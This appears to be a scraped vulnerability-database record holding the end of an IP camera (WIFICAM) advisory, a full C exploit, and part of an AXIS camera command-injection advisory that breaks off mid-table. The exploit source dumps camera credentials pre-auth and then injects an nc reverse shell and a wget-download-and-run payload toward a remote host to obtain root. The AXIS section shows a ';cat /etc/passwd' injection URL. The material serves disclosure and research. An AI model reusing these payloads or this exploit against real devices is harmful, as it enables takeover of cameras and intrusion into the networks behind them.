user2_pwd=\"wut\";\r\nvar user3_name=\"admin\";\r\nvar user3_pwd=\"admin\";\r\n[...]\r\n\r\n```\r\n\r\nThis is interesting because an attacker can reach a camera only by knowing a serial number. The UDP tunnel between the attacker and the camera is established even if the attacker doesn't know the credentials. It's useful to note the tunnel bypasses NAT and firewall, allowing the attacker to reach internal cameras (if they are connected to the Internet) and to bruteforce credentials. Then, the attacker can just try to bruteforce credentials of the camera:\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&\r\n\r\n```\r\n\r\nThis protocol appears to be common to a lot of Android applications, ie:\r\n\r\n* [object.p2pwificam.client](https://play.google.com/store/apps/details?id=object.p2pwificam.client) (500.000 - 1.000.000 installations)\r\n* [hsl.p2pipcam](https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000 - 500.000 installations)\r\n* [object.liouzx.client](https://play.google.com/store/apps/details?id=object.liouzx.client) (100.000 - 500.000 installations)\r\n* [object.lioupp.client](https://play.google.com/store/apps/details?id=object.lioupp.client) (100.000 - 500.000 installations)\r\n* [com.g_zhang.myp2pcam](https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam) (100.000 - 500.000 installations)\r\n* [object.aisaidezx.client](https://play.google.com/store/apps/details?id=object.aisaidezx.client) (50.000 - 100.000 installations)\r\n* [hsl.cam360](https://play.google.com/store/apps/details?id=hsl.cam360) (10.000 - 50.000 installations)\r\n* [bravocam.p2pipcam](https://play.google.com/store/apps/details?id=bravocam.p2pipcam) (10.000 - 50.000 installations)\r\n* [xcam.p2pipcam](https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [snugcam.p2pipcam](https://play.google.com/store/apps/details?id=snugcam.p2pipcam) (10.000 - 50.000 installations)\r\n* [myview.p2pipcam](https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000 - 10.000 installations)\r\n* [object.weimaisizx.client](https://play.google.com/store/apps/details?id=object.weimaisizx.client) (10.000 - 50.000 installations)\r\n* [com.tutk.P2PCamLive.Pixord](https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord) (10.000 - 50.000 installations)\r\n* [object.p2pnetwork.client](https://play.google.com/store/apps/details?id=object.p2pnetwork.client) (5.000 - 10.000 installations)\r\n\r\nThis list is very far from being complete.\r\n\r\nSo, I modified the original Android Application in order to try the pre-auth Info-Leak vulnerability:\r\n\r\n```\r\nk% ls -la\r\ntotal 14912\r\ndrwx------ 2 nobody nogroup 100 Mar 7 08:27 .\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\nk% ./apktool d object.p2pwificam.client.apk\r\nI: Using Apktool 2.2.2 on object.p2pwificam.client.apk\r\nI: Loading resource table...\r\nI: Decoding AndroidManifest.xml with resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nI: Loading resource table from file: /tmp/.local/share/apktool/framework/1.apk\r\nI: Regular manifest package...\r\nI: Decoding file-resources...\r\nI: Decoding values */* XMLs...\r\nI: Baksmaling classes.dex...\r\nI: Copying assets and libs...\r\nI: Copying unknown files...\r\nI: Copying original files...\r\nk%\r\n\r\n```\r\n\r\nI edit the library which manages all the custom HTTP requests.\r\n\r\nOne of the interesting string is `GET /%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`:\r\n\r\n```\r\nk% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so\r\n\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c /%sloginuse=%s&l\r\n0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d oginpas=%s&user=\r\n0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a %s&pwd=%s&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a led.. %s return:\r\n0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75 %d.ReConnectCou\r\n0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e nt: %d..PPPP_Con\r\n0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d nect success...m\r\n0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a _hSessionHandle:\r\n\r\n```\r\n\r\nAfter the modification:\r\n\r\n```\r\n0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420 ========....GET \r\n0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769 /system.ini?logi\r\n0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678 nuse&loginpass&x\r\n0001f680: 7878 7878 7878 7878 7826 0000 4449 443a xxxxxxxxx&..DID:\r\n0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d %s, cgi_get_com\r\n0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e mon: %s.PPPP_Con\r\n0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300 nect begin...%s.\r\n0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169 PPPP_Connect fai\r\n\r\n```\r\n\r\nThen, let's repack and sign the .apk:\r\n\r\n```\r\nk% ./apktool b object.p2pwificam.client\r\nI: Using Apktool 2.2.2\r\nI: Checking whether sources has changed...\r\nI: Checking whether resources has changed...\r\nI: Building resources...\r\nS: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...\r\nS: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable\r\nW: warning: string 'conectar' has no default translation.\r\nW: warning: string 'str_ipcamfour' has no default translation.\r\nW: warning: string 'user_pwd_no_show' has no default translation.\r\nI: Copying libs... (/lib)\r\nI: Building apk file...\r\nI: Copying unknown files/dir...\r\nk% openssl genrsa -out key.pem\r\n\r\nGenerating RSA private key, 2048 bit long modulus\r\n..........................................+++\r\n...................................................................+++\r\nunable to write 'random state'\r\ne is 65537 (0x010001)\r\nk% openssl req -new -key key.pem -out request.pem\r\n[...]\r\nk% openssl x509 -req -days 9999 -in request.pem -signkey key.pem -out certificate.pem\r\nSignature ok\r\nsubject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd\r\nGetting Private key\r\nunable to write 'random state'\r\nk% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out key.pk8 -nocrypt\r\nk% signapk certificate.pem key.pk8 object.p2pwificam.client/dist/object.p2pwificam.client.apk signed-object.p2pwificam.client.apk\r\nk% ls -latr\r\ntotal 21560\r\ndrwxrwxrwt 3 root root 140 Mar 7 08:25 ..\r\n-rwx------ 1 nobody nogroup 8488199 Mar 7 08:25 apktool.jar\r\n-rwx------ 1 nobody nogroup 2319 Mar 7 08:25 apktool\r\n-rwx------ 1 nobody nogroup 6773051 Mar 7 08:25 object.p2pwificam.client.apk\r\ndrwx------ 9 nobody nogroup 220 Mar 7 08:33 object.p2pwificam.client\r\n-rw------- 1 nobody nogroup 1675 Mar 7 08:33 key.pem\r\n-rw------- 1 nobody nogroup 956 Mar 7 08:33 request.pem\r\n-rw------- 1 nobody nogroup 1111 Mar 7 08:33 certificate.pem\r\n-rw------- 1 nobody nogroup 1217 Mar 7 08:33 key.pk8\r\ndrwx------ 3 nobody nogroup 220 Mar 7 08:34 .\r\n-rw------- 1 nobody nogroup 6787146 Mar 7 08:34 signed-object.p2pwificam.client.apk\r\n\r\n```\r\n\r\n`signed-object.p2pwificam.client.apk` is ready to be used.\r\n\r\nWhen using it, we see that:\r\n\r\nThe client indeed sends the `system.ini` request within the UDP tunnel:\r\n\r\n\r\n\r\nThe camera indeed receives this request within the UDP tunnel:\r\n\r\n\r\n\r\nComplete trace is:\r\n\r\n\r\n\r\nIt appears the pre-auth is not easily reachable within the cloud network.\r\n\r\nThis \"cloud\" protocol seems to be more a botnet protocol than a legit remote access protocol and has indeed weakness (everything in clear-text, i.e. an attacker can attack cameras within the cloud and leverage potential access to hack internal networks).\r\n\r\nA lot of P2P ('Cloud') cameras are in fact using the same botnet protocols and the same infrastructure seemingly to be managed by a single entity.\r\n\r\nWriting a PoC which bruteforces credentials of the remote camera is left as an exercise for the reader.\r\n\r\n## Vendor Response\r\n\r\nDue to difficulties in finding and contacting all the vendors, full-disclosure is applied.\r\n\r\n**I advise to IMMEDIATELY DISCONNECT cameras to the Internet. Hundreds of thousands cameras are affected by the 0day Info-Leak. Millions of them are using the insecure Cloud network.**\r\n\r\n## Report Timeline\r\n\r\n* Feb 26, 2017: Vulnerabilities found by Pierre Kim.\r\n* Mar 08, 2017: A public advisory is sent to security mailing lists.\r\n\r\n## Credits\r\n\r\nThese vulnerabilities were found by Pierre Kim ([@PierreKimSec](https://twitter.com/PierreKimSec)).\r\n\r\n## References\r\n\r\n[https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt](https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt)\r\n\r\n[https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html](https://pierrekim.github.io/blog/2017-03-06-camera-goahead-0day.html)\r\n\r\n## Disclaimer\r\n\r\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: [http://creativecommons.org/licenses/by-nc-sa/3.0/](http://creativecommons.org/licenses/by-nc-sa/3.0/)", "published": "2017-03-08T00:00:00", "type": "seebug", "title": "The Wireless IP Camera (P2P) WIFICAM Multiple vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8221", "CVE-2017-8222", "CVE-2017-8223", "CVE-2017-8224", "CVE-2017-8225"], "modified": "2017-03-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92748", "id": "SSV:92748", "sourceData": "\n #include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n#define CAM_PORT 80\r\n#define REMOTE_HOST \"192.168.1.1\"\r\n#define REMOTE_PORT \"1337\"\r\n#define PAYLOAD_0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20\" REMOTE_HOST \"+\" REMOTE_PORT \"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define PAYLOAD_1 \"GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\\r\\n\\r\\n\"\r\n#define PAYLOAD_2 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\n\r\n#define ALTERNATIVE_PAYLOAD_zero0 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+\" REMOTE_HOST \"+\" REMOTE_PORT \"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n#define ALTERNATIVE_PAYLOAD_zero1 \"GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://\" REMOTE_HOST \"/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\\r\\n\\r\\n\"\r\n\r\nchar * creds(char *argv,\r\n int get_config);\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[]);\r\n\r\n\r\nint main(int argc,\r\n char **argv,\r\n char **envp)\r\n{\r\n char *id;\r\n\r\n printf(\"Camera 0day root RCE with connect-back @PierreKimSec\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"%s target\\n\", argv[0]);\r\n printf(\"%s target --get-config will dump the configuration and exit\\n\", argv[0]);\r\n return (1);\r\n }\r\n\r\n if (argc == 2)\r\n printf(\"Please run `nc -vlp %s` on %s\\n\\n\", REMOTE_PORT, REMOTE_HOST);\r\n\r\n if (argc == 3 && !strcmp(argv[2], \"--get-config\"))\r\n id = creds(argv[1], 1);\r\n else\r\n id = creds(argv[1], 0);\r\n\r\n if (id == NULL)\r\n {\r\n printf(\"exploit failed\\n\");\r\n return (1);\r\n }\r\n printf(\"done\\n\");\r\n\r\n printf(\" login = %s\\n\", id);\r\n printf(\" pass = %s\\n\", id + 32);\r\n\r\n if (!rce(argv[1], id, PAYLOAD_0, \"planting\"))\r\n printf(\"done\\n\");\r\n sleep(1);\r\n if (!rce(argv[1], id, PAYLOAD_1, \"executing\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_2, \"cleaning\"))\r\n printf(\"done\\n\");\r\n if (!rce(argv[1], id, PAYLOAD_1, \"cleaning\"))\r\n printf(\"done\\n\");\r\n\r\n printf(\"[+] enjoy your root shell on %s:%s\\n\", REMOTE_HOST, REMOTE_PORT);\r\n\r\n return (0);\r\n}\r\n\r\n\r\nchar * creds(char *argv,\r\n int get_config)\r\n{\r\n int sock;\r\n int n;\r\n struct sockaddr_in serv_addr;\r\n char buf[8192] = { 0 };\r\n char *out;\r\n char *tmp;\r\n char payload[] = \"GET /system.ini?loginuse&loginpas HTTP/1.0\\r\\n\\r\\n\";\r\n int old_n;\r\n int n_total;\r\n\r\n\r\n sock = 0;\r\n n = 0;\r\n old_n = 0;\r\n n_total = 0;\r\n\r\n printf(\"[+] bypassing auth ... \");\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (NULL);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"creds: connect failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"creds: send failed\\n\");\r\n return (NULL);\r\n }\r\n\r\n if (!(tmp = malloc(10 * 1024 * sizeof(char))))\r\n return (NULL);\r\n\r\n if (!(out = calloc(64, sizeof(char))))\r\n return (NULL);\r\n\r\n while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)\r\n {\r\n n_total += n;\r\n if (n_total < 1024 * 10)\r\n memcpy(tmp + old_n, buf, n);\r\n if (n >= 0)\r\n old_n = n;\r\n }\r\n\r\n close(sock);\r\n\r\n /*\r\n [ HTTP HEADERS ]\r\n ...\r\n\r\n 000????: 0000 0a0a 0a0a 01.. .... .... .... ....\r\n ^^^^ ^^^^ ^^\r\n Useful reference in the binary data\r\n in order to to find the positions of\r\n credentials\r\n ...\r\n ... \r\n 0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n 00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n 00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n ...\r\n\r\n NOTE: reference can be too:\r\n 000????: 0006 0606 0606 0100 000a .... .... ....\r\n\r\n Other method: parse everything, find the \"admin\" string and extract the associated password\r\n by adding 31bytes after the address of 'a'[dmin].\r\n Works if the login is admin (seems to be this by default, but can be changed by the user)\r\n */\r\n\r\n if (get_config)\r\n {\r\n for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)\r\n printf(\"%c\", tmp[j]);\r\n exit (0);\r\n }\r\n\r\n\r\n for (unsigned int j = 50; j < 10 * 1024; j++)\r\n {\r\n if (tmp[j - 4] == 0x0a &&\r\n tmp[j - 3] == 0x0a &&\r\n tmp[j - 2] == 0x0a &&\r\n tmp[j - 1] == 0x0a &&\r\n tmp[j] == 0x01)\r\n {\r\n if (j + 170 < 10 * 1024)\r\n {\r\n strcat(out, &tmp[j + 138]);\r\n strcat(out + 32 * sizeof(char), &tmp[j + 170]);\r\n free(tmp);\r\n\r\n return (out);\r\n }\r\n }\r\n }\r\n\r\n free(tmp);\r\n\r\n return (NULL);\r\n}\r\n\r\nint rce(char *argv,\r\n char *id,\r\n char attack[],\r\n char desc[])\r\n{\r\n int sock;\r\n struct sockaddr_in serv_addr;\r\n char *payload;\r\n\r\n if (!(payload = calloc(512, sizeof(char))))\r\n return (1);\r\n\r\n sock = 0;\r\n\r\n printf(\"[+] %s payload ... \", desc);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Error while creating socket\\n\");\r\n return (1);\r\n }\r\n\r\n memset(&serv_addr, '0', sizeof(serv_addr));\r\n serv_addr.sin_family = AF_INET;\r\n serv_addr.sin_port = htons(CAM_PORT);\r\n\r\n if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)\r\n {\r\n printf(\"Error while inet_pton\\n\");\r\n return (1);\r\n }\r\n\r\n if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)\r\n {\r\n printf(\"rce: connect failed\\n\");\r\n return (1);\r\n }\r\n\r\n\r\n sprintf(payload, attack, id, id + 32);\r\n if (send(sock, payload, strlen(payload) , 0) < 0)\r\n {\r\n printf(\"rce: send failed\\n\");\r\n return (1);\r\n }\r\n\r\n return (0);\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92748"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:00", "description": "\nAXIS (Multiple Products) - devtools (Authenticated) Remote Command Execution", "edition": 1, "published": "2016-07-29T00:00:00", "title": "AXIS (Multiple Products) - devtools (Authenticated) Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8257"], "modified": "2016-07-29T00:00:00", "id": "EXPLOITPACK:ACB669AF665DBE40385085A8FAAD529D", "href": "", "sourceData": " _ _ _ _ _ _ _ _ _ _\n / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\\n( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )\n \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/\n\n www.orwelllabs.com\n security advisory\n olsa-2015-8257\n PGP: 79A6CCC0\n\n\n* Advisory Information\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector\n(+) Vendor: AXIS Communications\n(+) Research and Advisory: Orwelllabs\n(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html\n(+) Class: Improper Input Validation [CWE-20]\n(+) CVE Name: CVE-2015-8257\n(+) Remotely Exploitable: Yes\n(+) Locally Exploitable: No\n(+) OLSA-ID: OWLL2015-8257\n(+) Affected Versions: Multiple Products/Firmwares (check the list bellow)\n(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization\n(+) Owasp IoTTop10: I1, I2\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\nVulnerability\n+++++++++++++\nAXIS Network Cameras (various models/firmwares) are prone to Authenticated remote\ncommand execution vulnerability. Exploiting this vulnerability a remote attacker can\nforce the execution of certain unauthorized actions, which may lead to further attacks.\n\nTechnical Details\n+++++++++++++++++\nThe devtools.sh script is the responsible for vulnerability and it's 4 attack vectors through the following pages:\n\n\nhttp://xxx.xxx.xxx.xxx/app_license.shtml?app=\nhttp://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=\nhttp://xxx.xxx.xxx.xxx/app_index.shtml?app=\nhttp://xxx.xxx.xxx.xxx/app_params.shtml?app=\n\n\nAn attacker can use the app parameter that waits for the name of a\nlegitimate application to inject commands in the operating system using\n\"%3B\", for example, to read the contents of /etc/passwd:\n\nhttp: //\nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\n\nThe data entered in parameter \"app =\" is passed without any treatment for\ndevtools.sh script located at: {HTMLROOL}/bin/devtools.sh\n\nThis script contains several functions, namely:\n\nlist()\nstatus()\nmenulist()\nmainpagelink()\nSETTINGSLINK()\nconfvariable()\necho_ssivar_licensekey()\nload_auto_inst_form()\n\nWhen these functions are invoked, they interact with the parameters passed\nby the web application through\nthe affected scripts (e.g. ap_license.shtml? App =). By injecting the code\nbelow:\n\nhttp: //\nxxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd\n\nThe value passed in \"app\" will be passed directly to the script invoking\ndevtools.sh via shell -c as shown in the listing process below (third line\ninvoking confvariable function):\n\n[SNIP]\n 2039 led 25472 S /usr/bin/enldgts -n\n12014 root 0 SW [kworker/0:0]\n13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh\nconfvariable ORW..\n13183 root 2728 R ps -aux PACKAGENAME\n13312 root 0 SW [kworker/3:1]\n13320 root 0 SW [kworker/2:0]\n[SNIP]\n\nThe value \"ORWELLLABS%3Bcat%20/etc/passwd\" is then passed on to the\ncorresponding function (after passing through a conference on \"confvariable\n()\").\n\nconfvariable() {\nlocal val=\nif [ -r \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" ]; then\n. \"$PACKAGE_DIRECTORY/$1/$ADPPACKCFG\" || :\neval val=\\$$2\necho $val\nfi\n}\n\n\nThen enter the function \"menulist ()\" which we see the main stretch located\nbetween the lines 127 and 143:\n\n[SNIP]\n127 [ \"$ name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ activeMenu1 = $ APPNAME\" -> true <! - # Else - -> false <! - #\nendif ->, null,\n128 [\n129 [ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = param_ $ APPNAME\" -> true <! - # Else - -> false\n<! - # endif ->, null, []],\n130 EOF\n131 if [-z \"$ LICENSEPAGE\"] || [ \"$ LICENSEPAGE\" axis =]; Then\n132 cat << - EOF\n133 [ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = license_ $ APPNAME\" -> true <! - # Else - -> false\n<! - # endif ->, null, []],\n134 EOF\n135 fi\n136 if [ \"$ LICENSEPAGE\" = custom] && [-r \"$ HTMLROOT / local / $ APPNAME /\nlicense.inc\"]; Then\n137 cat << - EOF\n138 [ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <!\n- # If expr = \"\\ $ ActivePage custom_ = $ APP NAME\" -> true <! - # Else ->\nfalse <! - # endif ->, null, []],\n139 EOF\n140 fi\n141 if [-r \"$ HTMLROOT / local / $ APPNAME / about.inc\"]; Then\n142 cat << - EOF\n143 [ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = $ APPNAME\" -> true <! - # Else - > false <! - #\nendif ->, null, []],\n\n\nWhere the important lines are the menus below:\n\n\n/bin/devtools.sh (127):\n[ \"$ Name\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr\n= \"\\ $ activeMenu1 = $ APPNAME\" -> true -> false <! - #endif ->, null,\n/bin/devtools.sh (129):\n[ \"Settings\", \"/app_params.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif\n->, null, []],\n/bin/devtools.sh (133):\n[ \"License\", \"/app_license.shtml\", \"app = $ APPNAME &\" hostA, <! - # If\nexpr = \"\\ $ ActivePage = License\" -> true <! - # Else -> false <! - # endif\n->, null, []],\n/bin/devtools.sh (138):\n[ \"License\", \"/app_license_custom.shtml\", \"app = $ APPNAME &\" hostA, <! - #\nIf expr = \"\\ $ ActivePage = APPNAME\" -> true <! - # Else -> false <! - #\nendif ->, null, []],\n/bin/devtools.sh (143):\n[ \"About\", \"/app_index.shtml\", \"app = $ APPNAME &\" hostA, <! - # If expr =\n\"\\ $ ActivePage = $ APPNAME\" - # else -> false <! - # endif ->, null, []],\n\n\nIn PoC presented above, the payload will be triggered in line vector 133 of\ndevtools script ( \"License\" menu) that will:\n\n\n[ \"License\", \"/app_license.shtml\", \"app = ORWELLLABS% 3Bcat% 20\n/etc/passwd& \"HostA, <! - # If expr =\" \\ $ ActivePage = License \"-> true <!\n- # Else -> false <! - # Endif ->, null, []],\n\nAnd when executed echoes the results on the page.\n\n\nImpact\n++++++\nThe impact of this vulnerability is that taking into account the busybox\nthat runs behind (and with root privileges everywhere. in all the binaries\nand scripts) is possible to execute arbitrary commands, create backdoors,\nperforming a reverse connection to the machine attacker, use this devices\nas botnets and DDoS amplification methods... the limit is the creativity of\nthe attacker.\n\n\nAffected Products\n+++++++++++++++++\nMultiple Axis Communications Products/Firmware including:\n\n * AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -\nFirmware 5.41.1.4\n * AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -\nFirmware 5.70.1.2\n * AXIS A8004-VE Network Video Door Station -\nFirmware 5.85.1.1\n * AXIS P3384 fixed dome Network camera -\nFirmware 6.10.1\n * AXIS P5532-E PTZ Dome Network Camera -\nFirmware 5.41.3.1\n * AXIS Q60-E Network Dome PTZ -\nFirmware 5.65.1.1, 5.41.*, 5.70.1.1\n * AXIS Q7401 Video Encoder -\nFirmware 5.50.4\n * AXIS Q7404 Video Encoder -\nFirmware 5.50.4.*\n * AXIS Q7406 Blade Video Encoder -\nFirmware 5.51.2\n * AXIS Q7411 Video Encoder -\nFirmware 5.90.1\n * AXIS Q7414 Blade Video Encoder -\nFirmware 5.51.2\n * AXIS Q7424-R Video Encoder -\nFirmware 5.50.4\n * AXIS Q7424-R Mk II Video Encoder -\nFirmware 5.51.3\n * AXIS Q7436 Blade Video Encoder -\nFirmware 5.90.1\n\n\nThe list bellow shows the firmwares affected (and probably these firmwares\nare not available anymore, but just the last version of them, if you not\nsure, check the hash). All these firmwares (in the second column) has the\nsame \"devtools.sh\" shellscript (responsible for trigger the RCE\nvulnerability) embedded. The script can be found on directory:\n\"{HTMLROOT}/bin/devtools.sh\".\n\n========================================================================\nPRODUCT FIRMWARE FIRMWARE HASH\n========================================================================\nAXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a\nAXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d\nAXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10\nAXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921\nAXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7\nAXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\nAXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\nAXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e\nAXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\nAXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\nAXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a\nAXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e\nAXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\nAXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\nAXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\nAXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\nAXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\nAXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\nAXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866\nAXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65\nAXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811\nAXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e\nAXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70\nAXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7\nAXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b\nAXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6\nAXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d\nAXIS M3027 5.75.1.1 